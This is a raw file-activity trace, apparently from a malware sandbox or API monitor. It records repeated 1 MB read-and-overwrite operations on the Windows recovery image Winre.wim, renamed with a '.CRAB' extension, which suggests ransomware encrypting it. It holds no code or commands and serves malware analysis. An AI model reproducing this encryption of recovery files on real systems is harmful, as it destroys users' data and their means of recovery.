File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
